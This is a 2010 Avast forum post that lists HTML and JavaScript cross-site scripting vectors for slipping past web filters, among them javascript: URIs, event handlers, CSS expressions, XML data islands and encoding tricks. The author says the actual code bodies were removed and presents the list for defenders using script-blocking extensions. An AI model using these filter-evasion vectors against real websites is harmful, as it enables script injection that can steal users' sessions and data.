Avast WEBforum

Other => General Topics => Topic started by: polonus on July 19, 2010, 12:28:34 AM

Title: JavaScript to bypass many filters...
Post by: polonus on July 19, 2010, 12:28:34 AM
Hi malware fighters,

Here is a list:
Code: [Select]
<a href="javascript#">
  <div onmouseover=">
  <img src="javascript:">
  <img dynsrc="javascript:"> [IE]
  <input type="image" dynsrc="javascript:"> [IE]
  <bgsound src="javascript:"> [IE]
  &<script></script>
  &{}; [Fx
  <img src=&{};> [Fx]
  <link rel="stylesheet" href="javascript:">
  <iframe src="vbscript:"> [IE]
  <img src="mocha:"> [Fx]
  <img src="livescript:"> [Fx
  <a href="about:<script></script>">
  <meta http-equiv="refresh" content="0;url=javascript:">
  <body onload="">
  <div style="background-image: url(javascript:);">
  <div style="behaviour: url([link to code]);"> [IE]
  <div style="binding: url([link to code]);"> [Mozilla]
  <div style="width: expression();"> [IE]
  <style type="text/javascript"></style> [Fx]
  <object classid="clsid:..." codebase="javascript:"> [IE]
  <style><!--</style><script>//--></script>
  <!-- -- --><script></script><!-- -- -->
  <<script></script>
  <img src="blah"onmouseover="">
  <img src="blah>" onmouseover="">
  <xml src="javascript:">
  <xml id="X"><a><b>&lt;script>&lt;/script>;</b></a></xml>
    <div datafld="b" dataformatas="html" datasrc="#X"></div>
  [\xC0][\xBC]script>[\xC0][\xBC]/script> [UTF-8; IE, Opera]
  <![CDATA[<!--]] ><script>//--></script>

For security reasons I took where the code should go out of the examples
some only apply to specific browsers , so have your NS extension active...
firekeeper blocks them all...

polonus